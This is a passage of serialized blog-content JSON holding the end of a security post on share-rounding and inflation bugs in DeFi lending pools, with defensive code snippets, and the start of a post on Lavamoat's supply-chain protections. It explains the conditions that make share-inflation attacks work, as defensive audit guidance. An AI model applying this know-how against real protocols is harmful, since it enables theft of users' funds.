_maxSharePrice\n",{"type":27,"tag":207,"props":53722,"children":53723},{"class":209,"line":445},[53724],{"type":27,"tag":207,"props":53725,"children":53726},{"style":238},[53727],{"type":33,"value":10449},{"type":27,"tag":207,"props":53729,"children":53730},{"class":209,"line":867},[53731],{"type":27,"tag":207,"props":53732,"children":53733},{"style":214},[53734],{"type":33,"value":53735}," private\n",{"type":27,"tag":207,"props":53737,"children":53738},{"class":209,"line":892},[53739],{"type":27,"tag":207,"props":53740,"children":53741},{"style":214},[53742],{"type":33,"value":53743}," pure\n",{"type":27,"tag":207,"props":53745,"children":53746},{"class":209,"line":1475},[53747,53752,53756,53760],{"type":27,"tag":207,"props":53748,"children":53749},{"style":376},[53750],{"type":33,"value":53751}," returns",{"type":27,"tag":207,"props":53753,"children":53754},{"style":238},[53755],{"type":33,"value":686},{"type":27,"tag":207,"props":53757,"children":53758},{"style":8920},[53759],{"type":33,"value":53410},{"type":27,"tag":207,"props":53761,"children":53762},{"style":238},[53763],{"type":33,"value":10449},{"type":27,"tag":207,"props":53765,"children":53766},{"class":209,"line":2065},[53767],{"type":27,"tag":207,"props":53768,"children":53769},{"style":238},[53770],{"type":33,"value":18158},{"type":27,"tag":207,"props":53772,"children":53773},{"class":209,"line":2092},[53774,53778,53783,53787],{"type":27,"tag":207,"props":53775,"children":53776},{"style":376},[53777],{"type":33,"value":8986},{"type":27,"tag":207,"props":53779,"children":53780},{"style":238},[53781],{"type":33,"value":53782}," _maxSharePrice ",{"type":27,"tag":207,"props":53784,"children":53785},{"style":226},[53786],{"type":33,"value":15856},{"type":27,"tag":207,"props":53788,"children":53789},{"style":214},[53790],{"type":33,"value":53791}," true\n",{"type":27,"tag":207,"props":53793,"children":53794},{"class":209,"line":2130},[53795,53800,53805,53809],{"type":27,"tag":207,"props":53796,"children":53797},{"style":226},[53798],{"type":33,"value":53799}," ?",{"type":27,"tag":207,"props":53801,"children":53802},{"style":238},[53803],{"type":33,"value":53804}," _product % _pseudo ",{"type":27,"tag":207,"props":53806,"children":53807},{"style":226},[53808],{"type":33,"value":15856},{"type":27,"tag":207,"props":53810,"children":53811},{"style":232},[53812],{"type":33,"value":31543},{"type":27,"tag":207,"props":53814,"children":53815},{"class":209,"line":2168},[53816,53821,53826,53830],{"type":27,"tag":207,"props":53817,"children":53818},{"style":226},[53819],{"type":33,"value":53820}," ?",{"type":27,"tag":207,"props":53822,"children":53823},{"style":238},[53824],{"type":33,"value":53825}," _product ",{"type":27,"tag":207,"props":53827,"children":53828},{"style":226},[53829],{"type":33,"value":980},{"type":27,"tag":207,"props":53831,"children":53832},{"style":238},[53833],{"type":33,"value":53834}," _pseudo\n",{"type":27,"tag":207,"props":53836,"children":53837},{"class":209,"line":4095},[53838,53843,53847,53851,53856,53860],{"type":27,"tag":207,"props":53839,"children":53840},{"style":226},[53841],{"type":33,"value":53842}," :",{"type":27,"tag":207,"props":53844,"children":53845},{"style":238},[53846],{"type":33,"value":53825},{"type":27,"tag":207,"props":53848,"children":53849},{"style":226},[53850],{"type":33,"value":980},{"type":27,"tag":207,"props":53852,"children":53853},{"style":238},[53854],{"type":33,"value":53855}," _pseudo ",{"type":27,"tag":207,"props":53857,"children":53858},{"style":226},[53859],{"type":33,"value":2227},{"type":27,"tag":207,"props":53861,"children":53862},{"style":232},[53863],{"type":33,"value":26713},{"type":27,"tag":207,"props":53865,"children":53866},{"class":209,"line":4103},[53867,53872,53876,53880],{"type":27,"tag":207,"props":53868,"children":53869},{"style":226},[53870],{"type":33,"value":53871}," :",{"type":27,"tag":207,"props":53873,"children":53874},{"style":238},[53875],{"type":33,"value":53825},{"type":27,"tag":207,"props":53877,"children":53878},{"style":226},[53879],{"type":33,"value":980},{"type":27,"tag":207,"props":53881,"children":53882},{"style":238},[53883],{"type":33,"value":53884}," _pseudo;\n",{"type":27,"tag":207,"props":53886,"children":53887},{"class":209,"line":4154},[53888],{"type":27,"tag":207,"props":53889,"children":53890},{"style":238},[53891],{"type":33,"value":451},{"type":27,"tag":36,"props":53893,"children":53894},{},[53895,53900],{"type":27,"tag":942,"props":53896,"children":53897},{},[53898],{"type":33,"value":53899},"Regardless of which way the share rounding occurs, this is a bug",{"type":33,"value":53901},". The correct way would be to do calculations in units of shares and force users to withdraw in increments of shares (and then round down the tokens ultimately received in the end).",{"type":27,"tag":36,"props":53903,"children":53904},{},[53905],{"type":33,"value":53906},"This is a really tricky invariant to reason about!",{"type":27,"tag":28,"props":53908,"children":53910},{"id":53909},"root-cause",[53911],{"type":33,"value":53912},"Root Cause",{"type":27,"tag":36,"props":53914,"children":53915},{},[53916],{"type":33,"value":53917},"Even though this sort of exploit seems pervasive, it requires quite a lot of factors to be exploitable.",{"type":27,"tag":36,"props":53919,"children":53920},{},[53921],{"type":33,"value":53922},"Most importantly, the share value needs to be inflatable. Usually, this requires an integer representation for both shares and tokens. The conversion rate also needs to be expressed in terms of the shares and tokens as opposed to being stored separately.",{"type":27,"tag":101,"props":53924,"children":53926},{"className":11758,"code":53925,"language":11757,"meta":7,"style":7},"totalDepositShares * _amount / pseudoTotalPool\n",[53927],{"type":27,"tag":84,"props":53928,"children":53929},{"__ignoreMap":7},[53930],{"type":27,"tag":207,"props":53931,"children":53932},{"class":209,"line":210},[53933,53938,53942,53947,53951],{"type":27,"tag":207,"props":53934,"children":53935},{"style":238},[53936],{"type":33,"value":53937},"totalDepositShares ",{"type":27,"tag":207,"props":53939,"children":53940},{"style":226},[53941],{"type":33,"value":9286},{"type":27,"tag":207,"props":53943,"children":53944},{"style":238},[53945],{"type":33,"value":53946}," _amount ",{"type":27,"tag":207,"props":53948,"children":53949},{"style":226},[53950],{"type":33,"value":980},{"type":27,"tag":207,"props":53952,"children":53953},{"style":238},[53954],{"type":33,"value":53955}," pseudoTotalPool\n",{"type":27,"tag":36,"props":53957,"children":53958},{},[53959],{"type":33,"value":53960},"The second critical requirement is a generally empty pool. Inflating the share value means that all other shares also rise in value. If there are shares that are not controlled by the attacker, this would mean giving other users free money, almost definitely stopping inflation attacks.",{"type":27,"tag":36,"props":53962,"children":53963},{},[53964,53966,53970],{"type":33,"value":53965},"Finally, there must be improper rounding or accounting. This last requirement is generally easiest to satisfy. Share rounding is a new attack vector, and people haven't thought carefully about proper treatment of dust. Have you analyzed ",{"type":27,"tag":942,"props":53967,"children":53968},{},[53969],{"type":33,"value":27188},{"type":33,"value":53971}," integer division?",{"type":27,"tag":28,"props":53973,"children":53975},{"id":53974},"mitigations",[53976],{"type":33,"value":53977},"Mitigations",{"type":27,"tag":36,"props":53979,"children":53980},{},[53981],{"type":33,"value":53982},"The easiest way to prevent this attack is to prevent share values from being manipulated. An unexpectedly high share value can lead to denial of service scenarios and is probably worth mitigating by itself.",{"type":27,"tag":36,"props":53984,"children":53985},{},[53986,53988,53995],{"type":33,"value":53987},"The best way is to ensure that the pool has some amount of deposits on deployment, whether operationally or programmatically. As ",{"type":27,"tag":47,"props":53989,"children":53992},{"href":53990,"rel":53991},"https://twitter.com/danielvf/status/1746306320553152615",[51],[53993],{"type":33,"value":53994},"@danielvf notes",{"type":33,"value":53996},", protocols like Uniswap burn a portion of the initial deposit for this very reason.",{"type":27,"tag":101,"props":53998,"children":54000},{"className":11758,"code":53999,"language":11757,"meta":7,"style":7},"if (_totalSupply == 0) {\n liquidity = Math.sqrt(amount0.mul(amount1)).sub(MINIMUM_LIQUIDITY);\n _mint(address(0), MINIMUM_LIQUIDITY); // permanently lock the first MINIMUM_LIQUIDITY tokens\n} else {\n",[54001],{"type":27,"tag":84,"props":54002,"children":54003},{"__ignoreMap":7},[54004,54028,54075,54109],{"type":27,"tag":207,"props":54005,"children":54006},{"class":209,"line":210},[54007,54011,54016,54020,54024],{"type":27,"tag":207,"props":54008,"children":54009},{"style":376},[54010],{"type":33,"value":9023},{"type":27,"tag":207,"props":54012,"children":54013},{"style":238},[54014],{"type":33,"value":54015}," (_totalSupply ",{"type":27,"tag":207,"props":54017,"children":54018},{"style":226},[54019],{"type":33,"value":15856},{"type":27,"tag":207,"props":54021,"children":54022},{"style":232},[54023],{"type":33,"value":4680},{"type":27,"tag":207,"props":54025,"children":54026},{"style":238},[54027],{"type":33,"value":1424},{"type":27,"tag":207,"props":54029,"children":54030},{"class":209,"line":244},[54031,54036,54040,54045,54050,54055,54060,54065,54070],{"type":27,"tag":207,"props":54032,"children":54033},{"style":238},[54034],{"type":33,"value":54035}," liquidity ",{"type":27,"tag":207,"props":54037,"children":54038},{"style":226},[54039],{"type":33,"value":10380},{"type":27,"tag":207,"props":54041,"children":54042},{"style":238},[54043],{"type":33,"value":54044}," Math.",{"type":27,"tag":207,"props":54046,"children":54047},{"style":1335},[54048],{"type":33,"value":54049},"sqrt",{"type":27,"tag":207,"props":54051,"children":54052},{"style":238},[54053],{"type":33,"value":54054},"(amount0.",{"type":27,"tag":207,"props":54056,"children":54057},{"style":1335},[54058],{"type":33,"value":54059},"mul",{"type":27,"tag":207,"props":54061,"children":54062},{"style":238},[54063],{"type":33,"value":54064},"(amount1)).",{"type":27,"tag":207,"props":54066,"children":54067},{"style":1335},[54068],{"type":33,"value":54069},"sub",{"type":27,"tag":207,"props":54071,"children":54072},{"style":238},[54073],{"type":33,"value":54074},"(MINIMUM_LIQUIDITY);\n",{"type":27,"tag":207,"props":54076,"children":54077},{"class":209,"line":270},[54078,54083,54087,54091,54095,54099,54104],{"type":27,"tag":207,"props":54079,"children":54080},{"style":1335},[54081],{"type":33,"value":54082}," _mint",{"type":27,"tag":207,"props":54084,"children":54085},{"style":238},[54086],{"type":33,"value":1343},{"type":27,"tag":207,"props":54088,"children":54089},{"style":8920},[54090],{"type":33,"value":39898},{"type":27,"tag":207,"props":54092,"children":54093},{"style":238},[54094],{"type":33,"value":1343},{"type":27,"tag":207,"props":54096,"children":54097},{"style":232},[54098],{"type":33,"value":1660},{"type":27,"tag":207,"props":54100,"children":54101},{"style":238},[54102],{"type":33,"value":54103},"), MINIMUM_LIQUIDITY); ",{"type":27,"tag":207,"props":54105,"children":54106},{"style":4647},[54107],{"type":33,"value":54108},"// permanently lock the first MINIMUM_LIQUIDITY tokens\n",{"type":27,"tag":207,"props":54110,"children":54111},{"class":209,"line":296},[54112,54116,54120],{"type":27,"tag":207,"props":54113,"children":54114},{"style":238},[54115],{"type":33,"value":408},{"type":27,"tag":207,"props":54117,"children":54118},{"style":376},[54119],{"type":33,"value":10605},{"type":27,"tag":207,"props":54121,"children":54122},{"style":238},[54123],{"type":33,"value":384},{"type":27,"tag":36,"props":54125,"children":54126},{},[54127,54129,54136],{"type":33,"value":54128},"Alternatively, ",{"type":27,"tag":47,"props":54130,"children":54133},{"href":54131,"rel":54132},"https://github.com/SynonymFinance/smart-contracts-public/blob/759c6afe45720e26d731f081dfc747787ad7ae20/evm/src/contracts/lendingHub/HubInterestUtilities.sol#L52-L53",[51],[54134],{"type":33,"value":54135},"storing the conversion rate separately",{"type":33,"value":54137}," can also suffice. A key factor is that depositing additional tokens or burning shares affects the conversion rate. If the conversion rate is hardcoded and updated only during interest accrual, there's nothing to manipulate.",{"type":27,"tag":101,"props":54139,"children":54141},{"className":11758,"code":54140,"language":11757,"meta":7,"style":7},"accrualIndices.borrowed = accrualIndices.borrowed * borrowInterestFactor / precision;\naccrualIndices.deposited = accrualIndices.deposited * depositInterestFactor / precision;\n",[54142],{"type":27,"tag":84,"props":54143,"children":54144},{"__ignoreMap":7},[54145,54180],{"type":27,"tag":207,"props":54146,"children":54147},{"class":209,"line":210},[54148,54153,54157,54162,54166,54171,54175],{"type":27,"tag":207,"props":54149,"children":54150},{"style":238},[54151],{"type":33,"value":54152},"accrualIndices.borrowed ",{"type":27,"tag":207,"props":54154,"children":54155},{"style":226},[54156],{"type":33,"value":10380},{"type":27,"tag":207,"props":54158,"children":54159},{"style":238},[54160],{"type":33,"value":54161}," accrualIndices.borrowed ",{"type":27,"tag":207,"props":54163,"children":54164},{"style":226},[54165],{"type":33,"value":9286},{"type":27,"tag":207,"props":54167,"children":54168},{"style":238},[54169],{"type":33,"value":54170}," borrowInterestFactor ",{"type":27,"tag":207,"props":54172,"children":54173},{"style":226},[54174],{"type":33,"value":980},{"type":27,"tag":207,"props":54176,"children":54177},{"style":238},[54178],{"type":33,"value":54179}," precision;\n",{"type":27,"tag":207,"props":54181,"children":54182},{"class":209,"line":244},[54183,54188,54192,54197,54201,54206,54210],{"type":27,"tag":207,"props":54184,"children":54185},{"style":238},[54186],{"type":33,"value":54187},"accrualIndices.deposited ",{"type":27,"tag":207,"props":54189,"children":54190},{"style":226},[54191],{"type":33,"value":10380},{"type":27,"tag":207,"props":54193,"children":54194},{"style":238},[54195],{"type":33,"value":54196}," accrualIndices.deposited ",{"type":27,"tag":207,"props":54198,"children":54199},{"style":226},[54200],{"type":33,"value":9286},{"type":27,"tag":207,"props":54202,"children":54203},{"style":238},[54204],{"type":33,"value":54205}," depositInterestFactor ",{"type":27,"tag":207,"props":54207,"children":54208},{"style":226},[54209],{"type":33,"value":980},{"type":27,"tag":207,"props":54211,"children":54212},{"style":238},[54213],{"type":33,"value":54179},{"type":27,"tag":36,"props":54215,"children":54216},{},[54217],{"type":33,"value":54218},"We also want to note some general takeaways:",{"type":27,"tag":36,"props":54220,"children":54221},{},[54222,54224,54229],{"type":33,"value":54223},"Invariant testing is overhyped, but is quite applicable here. Instead of attempting to reason about effects after a state change, ",{"type":27,"tag":942,"props":54225,"children":54226},{},[54227],{"type":33,"value":54228},"apply the state changes and check the invariant",{"type":33,"value":1041},{"type":27,"tag":36,"props":54231,"children":54232},{},[54233],{"type":33,"value":54234},"From a protocol design perspective, users are withdrawing shares, not tokens. This is an important distinction. Your accounting logic should reason in terms of shares when possible.",{"type":27,"tag":36,"props":54236,"children":54237},{},[54238],{"type":33,"value":54239},"And finally, correct rounding behavior should still be accounted for, even if it doesn't seem impactful.",{"type":27,"tag":28,"props":54241,"children":54242},{"id":10112},[54243],{"type":33,"value":10115},{"type":27,"tag":36,"props":54245,"children":54246},{},[54247],{"type":33,"value":54248},"Rounding forces protocol developers to think carefully about dust. It's not always enough to round against the user. While initially this seems like a novel, scary attack vector, much of the impact can be mitigated operationally.",{"type":27,"tag":36,"props":54250,"children":54251},{},[54252],{"type":33,"value":54253},"As a final exercise to the reader: what is the correct rounding behavior during liquidations?",{"type":27,"tag":10127,"props":54255,"children":54256},{},[54257],{"type":33,"value":10131},{"title":7,"searchDepth":244,"depth":244,"links":54259},[54260,54261,54262,54266,54267,54268],{"id":30,"depth":244,"text":34},{"id":53183,"depth":244,"text":53186},{"id":53302,"depth":244,"text":53305,"children":54263},[54264,54265],{"id":53313,"depth":270,"text":53316},{"id":53351,"depth":270,"text":53354},{"id":53909,"depth":244,"text":53912},{"id":53974,"depth":244,"text":53977},{"id":10112,"depth":244,"text":10115},"content:blog:2024-01-18-rounding-bugs.md","blog/2024-01-18-rounding-bugs.md","blog/2024-01-18-rounding-bugs",{"_path":54273,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":54274,"description":54275,"author":54276,"image":54277,"date":54279,"isFeatured":19,"onBlogPage":19,"body":54280,"_type":10152,"_id":57756,"_source":10154,"_file":57757,"_stem":57758,"_extension":10157},"/blog/2024-06-10-supply-chain-attacks-a-new-era","Supply Chain Attacks: A New Era","Unpacking Lavamoat and how it fights supply chain attacks in Web3. We spill the beans on some sneaky bypasses, illustrating just how tricky it is to lock down JavaScript ecosystems.",[38463,38462],{"src":54278},"/posts/supply-chain-attacks-a-new-era/header.jpg","2024-06-10",{"type":24,"children":54281,"toc":57735},[54282,54286,54307,54312,54316,54321,54360,54366,54381,54399,54404,54409,54414,54427,54734,54760,54773,54778,54783,54797,54802,54815,54829,55060,55081,55116,55122,55127,55132,55345,55366,55372,55384,55474,55496,55532,55540,55558,55813,55839,55845,55859,56057,56076,56482,56495,56501,56520,56613,56618,56624,56637,56650,56736,56742,56754,56839,56851,56864,56870,56875,56889,57216,57221,57226,57232,57258,57313,57333,57386,57392,57397,57416,57427,57621,57627,57650,57656,57661,57674,57679,57684,57688,57693,57701,57731],{"type":27,"tag":28,"props":54283,"children":54284},{"id":26226},[54285],{"type":33,"value":26229},{"type":27,"tag":36,"props":54287,"children":54288},{},[54289,54296,54298,54305],{"type":27,"tag":47,"props":54290,"children":54293},{"href":54291,"rel":54292},"https://www.cloudflare.com/it-it/learning/security/what-is-a-supply-chain-attack/",[51],[54294],{"type":33,"value":54295},"Supply chain",{"type":33,"value":54297}," attacks are becoming ",{"type":27,"tag":47,"props":54299,"children":54302},{"href":54300,"rel":54301},"https://www.bleepingcomputer.com/news/security/ledger-dapp-supply-chain-attack-steals-600k-from-crypto-wallets/",[51],[54303],{"type":33,"value":54304},"increasingly popular in Web3",{"type":33,"value":54306},". In response, Lavamoat has emerged as a robust defense mechanism against supply chain attacks, offering sophisticated isolation and access control features. These help ensure that malicious dependencies cannot execute harmful code.",{"type":27,"tag":36,"props":54308,"children":54309},{},[54310],{"type":33,"value":54311},"In this article, we will explore how each component of Lavamoat works, and dive into the various bypasses we reported.",{"type":27,"tag":58,"props":54313,"children":54314},{"id":30},[54315],{"type":33,"value":34},{"type":27,"tag":36,"props":54317,"children":54318},{},[54319],{"type":33,"value":54320},"It is important to note that there are three different versions of LavaMoat:",{"type":27,"tag":12719,"props":54322,"children":54323},{},[54324,54336,54348],{"type":27,"tag":1232,"props":54325,"children":54326},{},[54327,54334],{"type":27,"tag":47,"props":54328,"children":54331},{"href":54329,"rel":54330},"https://github.com/LavaMoat/LavaMoat/tree/f3e53c8c44f063f000adc620b0aa3f7a41dda5c6/packages/browserify",[51],[54332],{"type":33,"value":54333},"Lavamoat Browserify",{"type":33,"value":54335}," serves as a bundle packer. This helps organize and package JavaScript code for frontend deployment.",{"type":27,"tag":1232,"props":54337,"children":54338},{},[54339,54346],{"type":27,"tag":47,"props":54340,"children":54343},{"href":54341,"rel":54342},"https://github.com/LavaMoat/LavaMoat/tree/f3e53c8c44f063f000adc620b0aa3f7a41dda5c6/packages/node",[51],[54344],{"type":33,"value":54345},"NodeJS Lavamoat",{"type":33,"value":54347}," is a variant of Lavamoat tailored specifically for Node.js environments.",{"type":27,"tag":1232,"props":54349,"children":54350},{},[54351,54358],{"type":27,"tag":47,"props":54352,"children":54355},{"href":54353,"rel":54354},"https://github.com/LavaMoat/LavaMoat/tree/f3e53c8c44f063f000adc620b0aa3f7a41dda5c6/packages/allow-scripts",[51],[54356],{"type":33,"value":54357},"Lavamoat allow-scripts",{"type":33,"value":54359}," are used to prevent malicious code execution on lifecycle scripts.",{"type":27,"tag":58,"props":54361,"children":54363},{"id":54362},"lavamoats-security-features",[54364],{"type":33,"value":54365},"Lavamoat's Security Features",{"type":27,"tag":36,"props":54367,"children":54368},{},[54369,54371,54379],{"type":33,"value":54370},"The three most important features of Lavamoat",{"type":27,"tag":22749,"props":54372,"children":54373},{},[54374],{"type":27,"tag":47,"props":54375,"children":54377},{"href":36885,"ariaDescribedBy":54376,"dataFootnoteRef":7,"id":36887},[22756],[54378],{"type":33,"value":1651},{"type":33,"value":54380}," are:",{"type":27,"tag":1228,"props":54382,"children":54383},{},[54384,54389,54394],{"type":27,"tag":1232,"props":54385,"children":54386},{},[54387],{"type":33,"value":54388},"Policy Files",{"type":27,"tag":1232,"props":54390,"children":54391},{},[54392],{"type":33,"value":54393},"NPM Anti Hijacking",{"type":27,"tag":1232,"props":54395,"children":54396},{},[54397],{"type":33,"value":54398},"Scuttling",{"type":27,"tag":36,"props":54400,"children":54401},{},[54402],{"type":33,"value":54403},"Let's go over them one by one.",{"type":27,"tag":26163,"props":54405,"children":54407},{"id":54406},"policy-files",[54408],{"type":33,"value":54388},{"type":27,"tag":36,"props":54410,"children":54411},{},[54412],{"type":33,"value":54413},"Policy files are one important feature of Lavamoat, as they limit access to the potentially dangeorus platform API and Globals.",{"type":27,"tag":36,"props":54415,"children":54416},{},[54417,54419,54426],{"type":33,"value":54418},"For example, take the ",{"type":27,"tag":47,"props":54420,"children":54423},{"href":54421,"rel":54422},"https://github.com/MetaMask/snaps/blob/c5ddd897734f900f459c66a91f3334e76903825c/packages/snaps-execution-environments/lavamoat/browserify/iframe/policy.json#L77",[51],[54424],{"type":33,"value":54425},"Metamask Snap policy file",{"type":33,"value":736},{"type":27,"tag":101,"props":54428,"children":54430},{"className":201,"code":54429,"language":200,"meta":7,"style":7}," \"@metamask/providers\": {\n \"globals\": {\n \"Event\": true,\n \"addEventListener\": true,\n \"chrome.runtime.connect\": true,\n \"console\": true,\n \"dispatchEvent\": true,\n \"document.createElement\": true,\n \"document.readyState\": true,\n \"ethereum\": \"write\",\n \"location.hostname\": true,\n \"removeEventListener\": true,\n \"web3\": true\n },\n \"packages\": {\n \"@metamask/object-multiplex\": true,\n \"@metamask/providers>@metamask/safe-event-emitter\": true\n",[54431],{"type":27,"tag":84,"props":54432,"children":54433},{"__ignoreMap":7},[54434,54446,54461,54481,54500,54520,54540,54560,54580,54600,54621,54641,54660,54676,54683,54698,54718],{"type":27,"tag":207,"props":54435,"children":54436},{"class":209,"line":210},[54437,54442],{"type":27,"tag":207,"props":54438,"children":54439},{"style":1325},[54440],{"type":33,"value":54441}," \"@metamask/providers\"",{"type":27,"tag":207,"props":54443,"children":54444},{"style":238},[54445],{"type":33,"value":44272},{"type":27,"tag":207,"props":54447,"children":54448},{"class":209,"line":244},[54449,54453,54457],{"type":27,"tag":207,"props":54450,"children":54451},{"style":1325},[54452],{"type":33,"value":44280},{"type":27,"tag":207,"props":54454,"children":54455},{"style":220},[54456],{"type":33,"value":736},{"type":27,"tag":207,"props":54458,"children":54459},{"style":238},[54460],{"type":33,"value":384},{"type":27,"tag":207,"props":54462,"children":54463},{"class":209,"line":270},[54464,54469,54473,54477],{"type":27,"tag":207,"props":54465,"children":54466},{"style":1325},[54467],{"type":33,"value":54468}," \"Event\"",{"type":27,"tag":207,"props":54470,"children":54471},{"style":220},[54472],{"type":33,"value":736},{"type":27,"tag":207,"props":54474,"children":54475},{"style":214},[54476],{"type":33,"value":19746},{"type":27,"tag":207,"props":54478,"children":54479},{"style":238},[54480],{"type":33,"value":1842},{"type":27,"tag":207,"props":54482,"children":54483},{"class":209,"line":296},[54484,54488,54492,54496],{"type":27,"tag":207,"props":54485,"children":54486},{"style":1325},[54487],{"type":33,"value":44332},{"type":27,"tag":207,"props":54489,"children":54490},{"style":220},[54491],{"type":33,"value":736},{"type":27,"tag":207,"props":54493,"children":54494},{"style":214},[54495],{"type":33,"value":19746},{"type":27,"tag":207,"props":54497,"children":54498},{"style":238},[54499],{"type":33,"value":1842},{"type":27,"tag":207,"props":54501,"children":54502},{"class":209,"line":445},[54503,54508,54512,54516],{"type":27,"tag":207,"props":54504,"children":54505},{"style":1325},[54506],{"type":33,"value":54507}," \"chrome.runtime.connect\"",{"type":27,"tag":207,"props":54509,"children":54510},{"style":220},[54511],{"type":33,"value":736},{"type":27,"tag":207,"props":54513,"children":54514},{"style":214},[54515],{"type":33,"value":19746},{"type":27,"tag":207,"props":54517,"children":54518},{"style":238},[54519],{"type":33,"value":1842},{"type":27,"tag":207,"props":54521,"children":54522},{"class":209,"line":867},[54523,54528,54532,54536],{"type":27,"tag":207,"props":54524,"children":54525},{"style":1325},[54526],{"type":33,"value":54527}," \"console\"",{"type":27,"tag":207,"props":54529,"children":54530},{"style":220},[54531],{"type":33,"value":736},{"type":27,"tag":207,"props":54533,"children":54534},{"style":214},[54535],{"type":33,"value":19746},{"type":27,"tag":207,"props":54537,"children":54538},{"style":238},[54539],{"type":33,"value":1842},{"type":27,"tag":207,"props":54541,"children":54542},{"class":209,"line":892},[54543,54548,54552,54556],{"type":27,"tag":207,"props":54544,"children":54545},{"style":1325},[54546],{"type":33,"value":54547}," \"dispatchEvent\"",{"type":27,"tag":207,"props":54549,"children":54550},{"style":220},[54551],{"type":33,"value":736},{"type":27,"tag":207,"props":54553,"children":54554},{"style":214},[54555],{"type":33,"value":19746},{"type":27,"tag":207,"props":54557,"children":54558},{"style":238},[54559],{"type":33,"value":1842},{"type":27,"tag":207,"props":54561,"children":54562},{"class":209,"line":1475},[54563,54568,54572,54576],{"type":27,"tag":207,"props":54564,"children":54565},{"style":1325},[54566],{"type":33,"value":54567}," \"document.createElement\"",{"type":27,"tag":207,"props":54569,"children":54570},{"style":220},[54571],{"type":33,"value":736},{"type":27,"tag":207,"props":54573,"children":54574},{"style":214},[54575],{"type":33,"value":19746},{"type":27,"tag":207,"props":54577,"children":54578},{"style":238},[54579],{"type":33,"value":1842},{"type":27,"tag":207,"props":54581,"children":54582},{"class":209,"line":2065},[54583,54588,54592,54596],{"type":27,"tag":207,"props":54584,"children":54585},{"style":1325},[54586],{"type":33,"value":54587}," \"document.readyState\"",{"type":27,"tag":207,"props":54589,"children":54590},{"style":220},[54591],{"type":33,"value":736},{"type":27,"tag":207,"props":54593,"children":54594},{"style":214},[54595],{"type":33,"value":19746},{"type":27,"tag":207,"props":54597,"children":54598},{"style":238},[54599],{"type":33,"value":1842},{"type":27,"tag":207,"props":54601,"children":54602},{"class":209,"line":2092},[54603,54608,54612,54617],{"type":27,"tag":207,"props":54604,"children":54605},{"style":1325},[54606],{"type":33,"value":54607}," \"ethereum\"",{"type":27,"tag":207,"props":54609,"children":54610},{"style":220},[54611],{"type":33,"value":736},{"type":27,"tag":207,"props":54613,"children":54614},{"style":1325},[54615],{"type":33,"value":54616}," \"write\"",{"type":27,"tag":207,"props":54618,"children":54619},{"style":238},[54620],{"type":33,"value":1842},{"type":27,"tag":207,"props":54622,"children":54623},{"class":209,"line":2130},[54624,54629,54633,54637],{"type":27,"tag":207,"props":54625,"children":54626},{"style":1325},[54627],{"type":33,"value":54628}," \"location.hostname\"",{"type":27,"tag":207,"props":54630,"children":54631},{"style":220},[54632],{"type":33,"value":736},{"type":27,"tag":207,"props":54634,"children":54635},{"style":214},[54636],{"type":33,"value":19746},{"type":27,"tag":207,"props":54638,"children":54639},{"style":238},[54640],{"type":33,"value":1842},{"type":27,"tag":207,"props":54642,"children":54643},{"class":209,"line":2168},[54644,54648,54652,54656],{"type":27,"tag":207,"props":54645,"children":54646},{"style":1325},[54647],{"type":33,"value":44432},{"type":27,"tag":207,"props":54649,"children":54650},{"style":220},[54651],{"type":33,"value":736},{"type":27,"tag":207,"props":54653,"children":54654},{"style":214},[54655],{"type":33,"value":19746},{"type":27,"tag":207,"props":54657,"children":54658},{"style":238},[54659],{"type":33,"value":1842},{"type":27,"tag":207,"props":54661,"children":54662},{"class":209,"line":4095},[54663,54668,54672],{"type":27,"tag":207,"props":54664,"children":54665},{"style":1325},[54666],{"type":33,"value":54667}," \"web3\"",{"type":27,"tag":207,"props":54669,"children":54670},{"style":220},[54671],{"type":33,"value":736},{"type":27,"tag":207,"props":54673,"children":54674},{"style":214},[54675],{"type":33,"value":53791},{"type":27,"tag":207,"props":54677,"children":54678},{"class":209,"line":4103},[54679],{"type":27,"tag":207,"props":54680,"children":54681},{"style":238},[54682],{"type":33,"value":44449},{"type":27,"tag":207,"props":54684,"children":54685},{"class":209,"line":4154},[54686,54690,54694],{"type":27,"tag":207,"props":54687,"children":54688},{"style":1325},[54689],{"type":33,"value":44457},{"type":27,"tag":207,"props":54691,"children":54692},{"style":220},[54693],{"type":33,"value":736},{"type":27,"tag":207,"props":54695,"children":54696},{"style":238},[54697],{"type":33,"value":384},{"type":27,"tag":207,"props":54699,"children":54700},{"class":209,"line":4203},[54701,54706,54710,54714],{"type":27,"tag":207,"props":54702,"children":54703},{"style":1325},[54704],{"type":33,"value":54705}," \"@metamask/object-multiplex\"",{"type":27,"tag":207,"props":54707,"children":54708},{"style":220},[54709],{"type":33,"value":736},{"type":27,"tag":207,"props":54711,"children":54712},{"style":214},[54713],{"type":33,"value":19746},{"type":27,"tag":207,"props":54715,"children":54716},{"style":238},[54717],{"type":33,"value":1842},{"type":27,"tag":207,"props":54719,"children":54720},{"class":209,"line":4249},[54721,54726,54730],{"type":27,"tag":207,"props":54722,"children":54723},{"style":1325},[54724],{"type":33,"value":54725}," \"@metamask/providers>@metamask/safe-event-emitter\"",{"type":27,"tag":207,"props":54727,"children":54728},{"style":220},[54729],{"type":33,"value":736},{"type":27,"tag":207,"props":54731,"children":54732},{"style":214},[54733],{"type":33,"value":53791},{"type":27,"tag":36,"props":54735,"children":54736},{},[54737,54738,54743,54745,54750,54752,54758],{"type":33,"value":23888},{"type":27,"tag":84,"props":54739,"children":54741},{"className":54740},[],[54742],{"type":33,"value":44522},{"type":33,"value":54744}," section in a LavaMoat policy specifies which global variables and properties a module can access, setting permissions for its global scope interactions. Similarly, the ",{"type":27,"tag":84,"props":54746,"children":54748},{"className":54747},[],[54749],{"type":33,"value":44530},{"type":33,"value":54751}," section outlines the module's dependencies and the permissions or trust relationships with those dependencies. This defines how ",{"type":27,"tag":84,"props":54753,"children":54755},{"className":54754},[],[54756],{"type":33,"value":54757},"@metamask/providers",{"type":33,"value":54759}," interacts with other packages.",{"type":27,"tag":36,"props":54761,"children":54762},{},[54763,54765,54771],{"type":33,"value":54764},"To enforce these policies, LavaMoat uses ",{"type":27,"tag":84,"props":54766,"children":54768},{"className":54767},[],[54769],{"type":33,"value":54770},"lavapack",{"type":33,"value":54772},", a custom webpack that wraps ever dependency and applies the specified rules independently.",{"type":27,"tag":26163,"props":54774,"children":54776},{"id":54775},"npm-anti-hijacking",[54777],{"type":33,"value":54393},{"type":27,"tag":36,"props":54779,"children":54780},{},[54781],{"type":33,"value":54782},"One important note is that Lavamoat can't rely solely on the names of the packages as they are published on NPM. Otherwise, a malicious actor could create a package with the same name as a popular, trusted 